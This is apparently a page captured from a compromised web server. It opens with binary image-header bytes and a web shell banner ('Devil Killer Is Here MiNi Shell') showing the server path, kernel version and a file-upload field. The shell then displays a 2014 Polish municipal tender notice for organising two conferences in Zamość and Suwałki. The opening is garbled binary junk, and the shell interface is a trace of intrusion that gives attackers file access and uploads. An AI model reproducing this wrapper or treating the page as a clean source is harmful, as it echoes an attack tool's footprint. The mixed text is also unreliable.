JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140131/35570-N-2014.html

<p class="kh_header"><b>Zamość: Organizacja konferencji w ramach projektu pn:Rozwój i współpraca pierścieniowych gmin Polski Wschodniej- konferencje w Gminie Suwałki i Gminie Zamość</b><br>
<b>Numer ogłoszenia: 35570 - 2014; data zamieszczenia: 31.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zamość , ul. Peowiaków 92, 22-400 Zamość, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ugzamosc.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja konferencji w ramach projektu pn:Rozwój i współpraca pierścieniowych gmin Polski Wschodniej- konferencje w Gminie Suwałki i Gminie Zamość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Organizacja konferencji w ramach projektu pn: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej - konferencje w Gminie Suwałki i Gminie Zamość. Pierwsza konferencja organizowana będzie na terenie miasta Zamość lub gminy Zamość dla 70 osób w terminie 8-9 maj 2014 r., a druga konferencja zorganizowana będzie na terenie gminy Suwałki dla 85 osób w terminie 11-12 wrzesień 2014 r.

Część 1 Organizacja konferencji na terenie Gminy Zamość

1. Najem sali konferencyjnych wraz z wyposażeniem 
2. Zapewnienie zakwaterowania dla uczestników konferencji 
3. Zapewnienie obsługi cateringowej
4. Wykonanie i druk zaproszeń oraz plakatów na konferencję
5. Wykonanie zestawów konferencyjnych

Czas trwania konferencji 10 godzin zegarowych: (1 dzień- 5 godzin, 2 dzień - 5 godzin)
Ilość uczestników konferencji: 70 osób

W ramach konferencji należy zapewnić:
a) Zakwaterowanie: nocleg dla 40 osób ze śniadaniem i kolacją
Nocleg dla 40 osób w jednym obiekcie noclegowym (typu hotel, gościniec, pensjonat, obiekt szkoleniowo-konferencyjny, wyklucza się obiekty typu: internat, dom studenta, itp.) Pokoje noclegowe 1- lub 2-osobowe z łazienkami. (Każdy pokój musi mieć oddzielną łazienkę). Co najmniej 30% uczestników powinno mieć możliwość zakwaterowania w pokojach jednoosobowych. Pokoje powinny być klimatyzowane oraz muszą być dostępne dla uczestników przez dwa dni konferencji bez ograniczenia godzinowego.
W pokojach dla gości musi być zagwarantowany dostęp do wody mineralnej butelkowanej (co najmniej 1l wody mineralnej dla jednej osoby na 1 dzień).
Śniadanie w formie bufetowej (wędliny, sery, ryby, twaróg, warzywa, chleb, płatki, jajka itp., napoje gorące: kawa, herbata, soki, woda, cukier, cytryna, mleko lub śmietanka). Śniadanie musi być zorganizowane w tym samym obiekcie, co nocleg.
Kolacja dla 40 osób: Kolacja dla osób korzystających z noclegu. Kolacja w formie zasiadanej. W menu muszą znaleźć się przystawki (wędliny, sery, ryby, co najmniej 4 rodzaje sałatek w tym jedna bezmięsna, chleb, itp. oraz co najmniej dwa dania gorące w tym co najmniej jedno danie mięsne (udka pieczone, talerz mięs: szaszłyki, żeberka, karkówka, zapiekanka mięsno-warzywna itp.), napoje gorące kawa, herbata, soki, woda, cukier, cytryna, mleko lub śmietanka).
Wymagany jest kompleksowy serwis gastronomiczny (dekoracja stołów, przygotowanie, nakrycie stołów, zastawa - z wyłączeniem naczyń jednorazowego użytku, serwetki, obsługa kelnerska oraz sprzątanie,itp.).
Szczegółowe menu na konferencję ma być ustalane i zaakceptowane przez Zamawiającego, co najmniej 1 tydzień przed dniem rozpoczęcia konferencji.
b) Usługi cateringowe - 70 osób każdego dnia konferencji: wyżywienie na konferencji.
W ramach konferencji należy zapewnić:
Pierwszy i drugi dzień konferencji: przez cały czas trwania konferencji świeżo parzoną gorąca kawę i herbatę, cukier, cytryna, mleko lub śmietanka, oraz co najmniej 3 rodzaje ciast pieczonych (np: sernik, szarlotka), 4 rodzaje ciast kruchych, owoce, soki owocowe co najmniej 2 rodzaje, woda mineralna gazowana i niegazowana - wszystkie ww produkty nielimitowane uzupełniane w razie potrzeby.
Obiad dla 70 osób (zupa i danie drugie typu: ziemniaki,.ryż,kasza, kotlet schabowy lub kotlet z piersi kurczak, zestaw surówek-sałatek lub warzywa przyrządzane na ciepło + deser: lody, sorbety, kremy). 
Wymagany jest kompleksowy serwis gastronomiczny (dekoracja stołów, przygotowanie, nakrycie stołów, zastawa - z wyłączeniem naczyń jednorazowego użytku, serwetki, obsługa kelnerska oraz sprzątanie, itp.) 
Szczegółowe menu na konferencję ma być ustalane i zaakceptowane przez Zamawiającego co najmniej 1 tydzień przed dniem rozpoczęcia konferencji.
c) Sala konferencyjna dostosowana do liczby uczestników przy ustawieniu stolików i krzeseł w taki sposób, aby uczestnik konferencji siedział przodem lub bokiem do ekranu i prowadzących. Wyposażenie sali konferencyjnej: krzesełka i stoliki, klimatyzacja, nagłośnienie + 2 mikrofony bezprzewodowe, projektor multimedialny (rzutnik), ekran do projekcji, laptop umożliwiający uruchomienie prezentacji zapisanych w programie Microsoft Power Point 2007 oraz filmów z płyt dvd  lub pamięci przenośnej flash.
Sala konferencyjna powinna mieścić się w tym samym obiekcie (budynku), co pokoje noclegowe dla uczestników. Sala konferencyjna powinna być klimatyzowana, posiadać zaplecze sanitarne oraz posiadać możliwość wygospodarowania i wyznaczenie miejsca na recepcję konferencji, której zadaniem będzie obsługa uczestników przez cały czas trwania konferencji. 
d) Zaproszenia - 70 sztuk: przygotowanie w porozumieniu z Zamawiającym wzoru zaproszenia na konferencję oraz następnie wydrukowanie zaproszeń na papierze w ilości 70 sztuk oraz dostarczenie do Urzędu Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość w terminie 21 dni przed konferencją. Zaproszenie: format papieru A4 składany na 3 lub 2 części + koperta, papier biały lub barwiony w kolorze ecru lub podobnym, druk dwustronny kolor, papier kreda, gramatura co najmniej 220g + wkładka do zaproszenia, pełny kolor.
e) Plakaty - 80 sztuk: Przygotowanie w porozumieniu z Zamawiającym wzoru plakatów związanych z realizacją konferencji oraz następnie wydrukowanie plakatów w ilości 80 sztuk i dostarczenie do Urzędu Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość w terminie 14 dni przed konferencją. Plakaty: format: A3, druk kolor, ilość 80 sztuk.
f) Zestawy konferencyjne- 70 sztuk: 
W skład 1 zestawu konferencyjnego wychodzi:
-Notes: notes format A5 z gumką, 40-80 kartek w notesie, notes szyty lub klejony po dłuższym lub krótszym boku, okładka sztywna materiał skóropodobny lub inne dobrej jakości tworzywo sztuczne. Notes musi zostać oznakowany zgodnie z wytycznymi dla Programu Operacyjnego Rozwój Polski Wschodniej.
-Długopis: metalowy długopis automatyczny z mechanizmem przyciskanym od góry lub z boku długopisu, lub przekręcanym: długość długopisu 14 cm (+_- 3 cm), w etui, pudełku lub tubie. Długopis musi zostać oznakowany zgodnie z wytycznymi dla Programu Operacyjnego Rozwój Polski Wschodniej.
Zestawy konferencyjne należy dostarczyć do Urzędu Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość w terminie 14 dni przed konferencją. 

Wzór nadruku na długopis i notes (flaga UE, logo PO RPW, herb gminy, tekst itp.) Zamawiający uzgodni z Wykonawcą. 

Część 2 Organizacja konferencji na terenie Gminy Suwałki

1. Najem sali konferencyjnych wraz z wyposażeniem
2. Zapewnienie zakwaterowania dla uczestników konferencji
3. Zapewnienie obsługi cateringowej
4. Wykonanie i druk zaproszeń oraz plakatów na konferencję
5. Wykonanie zestawów konferencyjnych

Czas trwania konferencji 10 godzin zegarowych: (1 dzień- 5 godzin, 2 dzień - 5 godzin)
Ilość uczestników konferencji: 85 osób

W ramach konferencji należy zapewnić:
a) Zakwaterowanie: nocleg dla 50 osób ze śniadaniem i kolacją. 
Nocleg dla 50 osób jednym obiekcie noclegowym (typu hotel, gościniec, pensjonat, obiekt szkoleniowo-konferencyjny, wyklucza się obiekty typu: internat, dom studenta, itp.) Pokoje noclegowe 1- lub 2-osobowe z łazienkami (każdy pokój musi mieć oddzielną łazienkę). Co najmniej 30% uczestników powinno mieć możliwość zakwaterowania w pokojach jednoosobowych. Pokoje powinny być dostępne dla uczestników przez dwa dni konferencji, bez ograniczenia godzinowego. W pokojach dla gości musi być zagwarantowany dostęp do wody mineralnej butelkowanej (co najmniej 1l wody mineralnej dla jednej osoby na 1 dzień).
Śniadanie w formie bufetowej (wędliny, sery, ryby, twaróg, warzywa, chleb, płatki, jajka, itp.,  napoje gorące: kawa, herbata, soki, woda, cukier, cytryna, mleko lub śmietanka). Śniadanie musi zostać zorganizowane w tym samym obiekcie, co nocleg.
Kolacja w formie zasiadanej. W menu muszą znaleźć się przystawki (wędliny, sery, ryby, co najmniej 3 rodzaje sałatek w tym jedna bezmięsna, chleb, itp. oraz co najmniej dwa dania gorące w tym, co najmniej jedno danie mięsne (udka pieczone, talerz mięs: szaszłyki, żeberka, karkówka, zapiekanki mięso-warzywne), napoje gorące kawa, herbata, soki, woda, cukier, cytryna, mleko lub śmietanka.
Wymagany jest kompleksowy serwis gastronomiczny (dekoracja stołów, przygotowanie, nakrycie stołów, zastawa - z wyłączeniem naczyń jednorazowego użytku, serwetki, obsługa kelnerska oraz sprzątanie, itp) 
Szczegółowe menu na konferencję ma być ustalane i zaakceptowane przez Zamawiającego co najmniej 1 tydzień przed dniem rozpoczęcia konferencji.
b) Usługi cateringowe na konferencji- 85 osób każdego dnia: wyżywienie na konferencji.
W ramach konferencji należy zapewnić: 
Pierwszy i drugi dzień konferencji: przez cały czas trwania konferencji świeżo parzoną gorącą kawę i herbatę, cukier, cytrynę, mleko lub śmietankę oraz co najmniej 3 rodzaje ciast pieczonych, 4 rodzaje kruchych ciastek, owoce, soki owocowe co najmniej 2 rodzaje, woda mineralna gazowana i niegazowana - ww produkty nielimitowane uzupełniane w razie potrzeby.
Obiad dla 85 osób (zupa i danie drugie typu: ziemniaki,ryż,kasza, kotlet schabowy lub kotlet z piersi kurczak, zestaw surówek-sałatek lub warzywa przyrządzane na ciepło + deser: lody, sorbety, kremy). 
Wymagany jest kompleksowy serwis gastronomiczny (dekoracja stołów, przygotowanie, nakrycie stołów, zastawa - z wyłączeniem naczyń jednorazowego użytku, serwetki, obsługa kelnerska oraz sprzątanie, itp.) 
Szczegółowe menu na konferencję ma być ustalane i zaakceptowane przez Zamawiającego, co najmniej 1 tydzień przed dniem rozpoczęcia konferencji 
c) Sala konferencyjna dostosowana do liczby uczestników (85 osób) przy ustawieniu stolików i krzeseł w taki sposób, aby uczestnik konferencji siedział przodem lub bokiem do ekranu i prowadzących. Wyposażenie sali konferencyjnej: krzesełka i stoliki, klimatyzacja, nagłośnienie + 2 mikrofony bezprzewodowe dla uczestników, projektor multimedialny (rzutnik), ekran do projekcji, laptop umożliwiający uruchomienie prezentacji zapisanych w programie Microsoft Power Point 2007 oraz filmów z płyt dvd lub pamięci przenośnej flash.
Sala konferencyjna powinna mieścić się w tym samym obiekcie (budynku), co pokoje noclegowe dla uczestników. Sala konferencyjna powinna być klimatyzowana, posiadać zaplecze sanitarne oraz posiadać możliwość wygospodarowania i wyznaczenie miejsca na recepcję konferencji, której zadaniem będzie obsługa uczestników przez cały czas trwania konferencji. 
d) Zaproszenia - 85 sztuk: przygotowanie w porozumieniu z Gminą Suwałki i Zamawiającym wzoru zaproszenia na konferencję oraz następnie wydrukowanie zaproszeń na papierze w ilości 85 sztuk oraz dostarczenie do Urzędu Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki w terminie 30 dni przed konferencją. Zaproszenie: format papieru A4 składany na 3 lub 2 części + koperta, papier biały lub barwiony w kolorze ecru lub podobnym, druk dwustronny pełny kolor, papier kreda, gramatura, co najmniej 220g + ewentualnie wkładka do zaproszenia, pełny kolor.
e) Plakaty - 80 sztuk: Przygotowanie w porozumieniu z Zamawiającym i Gminą Suwałki wzoru plakatów związanych z realizacją konferencji oraz następnie wydrukowanie plakatów w ilości 80 sztuk i dostarczenie do Urzędu Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki w terminie 30 dni przed konferencją. Plakaty: format: A3, druk kolor, ilość 80 sztuk
f) Zestawy konferencyjne- 85 sztuk: 
W skład 1 zestawu konferencyjnego wychodzi:
-Notes: notes format A5 z gumką, 40-80 kartek w notesie, notes szyty lub klejony po dłuższym lub krótszym boku, okładka sztywna materiał skóropodobny lub inne dobrej jakości tworzywo sztuczne. Notes musi zostać oznakowany zgodnie z wytycznymi dla Programu Operacyjnego Rozwój Polski Wschodniej.
-Długopis: metalowy długopis automatyczny z mechanizmem przyciskanym od góry lub z boku długopisu, lub przekręcanym: długość długopisu 14 cm (+_- 3 cm), w etui, pudełku lub tubie. Długopis musi zostać oznakowany zgodnie z wytycznymi dla Programu Operacyjnego Rozwój Polski Wschodniej.
Zestawy konferencyjne należy dostarczyć do do Urzędu Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki w terminie 14 dni przed konferencją. 
Wzór nadruków i grawerów na długopis i notes (flaga UE, logo PO RPW, herb gminy, tekst itp.) Wykonawca uzgodni z Zamawiającym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.10.00.00-1, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali:co najmniej 2 usługi w zakresie organizacji spotkań lub konferencji lub świadczenia usług hotelarskich i żywieniowych, których łączna wartość wynosi co najmniej 28 000,00 złotych brutto.
wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonywanych głównych dostaw lub usług w okresie ostatnich 3 lat przed upływem składania ofert albo wniosków o dopuszczenie do udziału w post. A jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy lub usługi zostały wykonane oraz z załączenie dowodów czy są lub były wykonane należycie - wzór formularza do ewentualnego wykorzystania - zał. nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy dla części 1 zał. nr 1a, dla części 2 zał. nr 1b, kalkulacja kosztów dla części 1 zał. nr 2a, dla części 2 zał. nr 2b</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego, gdy:

1. nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w szczególności w zakresie wysokości stawki podatku od towarów i usług VAT,
2. nastąpi konieczność zmiany ilości poszczególnych usług w zależności od faktycznego zapotrzebowania, poprzez zmniejszenie ilości jednej usługi i zwiększenie ilości innej usługi, bez możliwości zmiany wartości całkowitej umowy.
3. nastąpi konieczność zmiany lub wydłużenia terminu realizacji zamówienia spowodowana obiektywnymi czynnikami, niezależnymi od Wykonawcy z zastrzeżeniem, iż wydłużenie terminu realizacji zamówienia nie spowoduje wzrostu łącznego wynagrodzenia Wykonawcy za realizację zamówienia i wzrostu cen jednostkowych poszczególnych usług, określonych w ofercie Wykonawcy,
4. nastąpi konieczność skrócenia lub wydłużenia terminów realizacji poszczególnych zamówień z przyczyn nie leżących po stronie Wykonawcy, bez zmiany cen jednostkowych za realizację poszczególnych zamówień.
5. dopuszcza się zmianę daty konferencji za zgodą Zamawiającego, Gminy Suwałki i Zamość w przypadku pojawienia się okoliczności, w których zmiana terminu będzie korzystna dla Zamawiającego. Zmiana terminu będzie musiała być uzgodniona przez obie strony umowy.
6. Zamawiający dopuszcza wprowadzenie zmian w umowie wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Wszelkie zmiany dokonane zostaną za porozumieniem Zamawiającego i Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ugzamosc.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zamość, ul. Peowiaków 92,22-400 Zamość, pokój 20 ( po wcześniejszym zamówieniu telefonicznym tel. 84 639-29-59 wewn. 23).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2014 godzina 09:15, miejsce: Urząd Gminy Zamość, ul. Peowiaków 92,22-400 Zamość, Punkt Obsługi Interesanta, stanowisko nr 1
otwarcie ofert - dnia 10.02.2014 r. godz. 09:30 w Świetlicy Urzędu Gminy Zamość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego
w ramach Programu Operacyjnego Rozwój Polski Wschodniej.</p>
